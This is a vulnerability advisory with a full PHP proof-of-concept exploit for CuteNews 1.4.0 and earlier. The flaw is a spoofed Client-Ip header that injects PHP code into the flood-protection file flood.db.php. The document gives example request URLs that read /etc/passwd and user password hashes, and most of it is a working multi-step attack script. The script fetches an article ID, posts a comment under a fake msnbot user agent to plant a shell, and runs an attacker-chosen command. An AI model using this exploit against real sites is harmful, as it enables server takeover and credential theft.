CuteNews 1.4.0 (possibly prior versions) remote code execution software: site: http://cutephp.com/ description: "Cute news is a powerful and easy for using news management system that use flat files to store its database. It supports comments, archives, search function, image uploading, backup function, IP banning, flood protection ..." vulnerability: in flood protection code, look at this code inside /inc/shows.inc.php: ... //---------------------------------- // Get the IP //---------------------------------- $foundip = TRUE; [!] if (getenv("HTTP_CLIENT_IP")) $ip = getenv("HTTP_CLIENT_IP"); [!] else if(getenv("REMOTE_ADDR")) $ip = getenv("REMOTE_ADDR"); else if(getenv("HTTP_X_FORWARDED_FOR")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else {$ip = "not detected"; $foundip = FALSE;} [!] if( $foundip and !ip2long($ip) ){ $ip = "not detected"; $foundip = FALSE;} //ensure that what we have is a real IP [!] ... many people, I think, simply doesn't know what is HTTP_CLIENT_IP header, you can easily set and spoof it in a request packet, example: POST /somescript.php HTTP/1.0 Client-Ip: 127.0.0.1 User-Agent: somebrowser ... ETC. this line: ... if( $foundip and !ip2long($ip) ){ $ip = "not detected"; $foundip = FALSE;} ... is simply a non-sense, because ip2long($ip) is always true, so we can inject PHP code in Client-Ip field. The flood protection features stores data in a temporary file with php extension, /data/flood.db.php, usually we have something like this: 1126976551|127.0.0.1|1126966862| but this time we have: 1126976551||1126966862| ;) so you can launch commands until a user post another comment to an article: http://[target]/[path]/cute/data/flood.db.php?cmd=cat%20/etc/passwd to see /etc/passwd file http://[target]/[path]/cute/data/flood.db.php?cmd=cat%20users.db.php to see password hashes of any admin / user and so on... this is my proof of concept exploit, handle with care eehehehehe: CuteNews <= 1.4.0 remote commands execution

CuteNews <= 1 . 4 . 0 (possibly prior versions) remote commands execution

a script by rgod at http://rgod.altervista.org

hostname (ex: www.sitename.com)

path (ex: /cute/ or just /)

main page where article are listed, ex: in default installation "example2.php"

specify a port other than 80 ( default value )

a Unix command , example: ls -la to list directories, ca t /etc/passwd to show passwd file

send exploit through an HTTP proxy (ip:port)

'; function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo ''; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo ""; for ($li=0; $li<=15; $li++) { echo ""; } $ki=$ki+16; echo ""; } if (strlen($datai)==1) {echo "";} else {echo " ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo ""; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo ""; } echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacket($packet) { global $proxy, $host, $port, $html; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port);} else { if (!eregi($proxy_regex,$proxy)) {echo htmlentities($proxy).' -> not a valid proxy...'; die; } $parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); echo nl2br(htmlentities($html)); } if (($path<>'') and ($host<>'') and ($command<>'') and ($main<>'')) { if ($port=='') {$port=80;} #STEP 1 -> Retrieve an article id if ($proxy=='') {$packet="GET ".$path.$main." HTTP/1.0 \r\n";} else {$packet="GET ".$host.$path.$main." HTTP/1.0 \r\n";} $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n\r\n"; $packet.="Connection: Close\r\n\r\n"; show($packet); //show the packet for debugging purposes sendpacket($packet); $temp=explode("id=",$html); $temp2=explode("&",$temp[1]); $articleid=$temp2[0]; echo '

Article ID -> '.htmlentities($articleid).'

'; #STEP 2 -> Inject a shell in flood.db.php $shell=''; //customize it for your own pleasure... $title=':)'; //comment title $comment='Very glad to read such a good article! You should win Pulitzer prize!'; //customize here $data="name=".urlencode($title)."&comments=".urlencode($comment)."&submit=Add+My+Comment&subaction=addcomment&ucat=1&show="; if ($proxy=='') {$packet="POST ".$path.$main."?subaction=showcomments&id=".urlencode($articleid)."&archive=&start_from=&ucat=1& HTTP/1.1\r\n";} else {$packet="POST http://".$host.$path.$main."?subaction=showcomments&id=".urlencode($articleid)."&archive=&start_from=&ucat=1& HTTP/1.1\r\n";} $packet.="User-Agent: msnbot/1.0 (+http://search.msn.com/msnbot.htm)\r\n"; $packet.="Client-Ip: ".$shell."\r\n"; //spoof HTTP_CLIENT_IP var... $packet.="Host: ".$host."r\n"; $packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n"; $packet.="Accept-Language: it,en;q=0.9\r\n"; $packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n"; $packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n"; $packet.="Referer: http://".$host.$path."example2.php?subaction=showcomments&id=".urlencode($articleid)."&archive=&start_from=&ucat=1&\r\n"; $packet.="Connection: Keep-Alive, TE\r\n"; $packet.="TE: deflate, gzip, chunked, identity, trailers\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n\r\n"; $packet.=$data; show($packet); // debugging... sendpacket($packet); # STEP 3 -> Launch commands echo '
If CuteNews is unpatched and vulnerable, now you will see '.htmlentities($command).' output...
'; if ($proxy=='') {$packet="GET ".$path."data/flood.db.php?cmd=".urlencode($command)." HTTP/1.0 \r\n";} else {$packet="GET ".$host.$path."data/flood.db.php?cmd=".urlencode($command)." HTTP/1.0 \r\n";} $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n\r\n"; $packet.="Connection: Close\r\n\r\n"; show($packet); //debugging... sendpacket($packet); } else {echo 'fill in all requested fields...';} ?> rgod site: http://rgod.altervista.org mail: retrogod [at] aliceposta it original advisory: http://rgod.altervista.org/cutenews140.html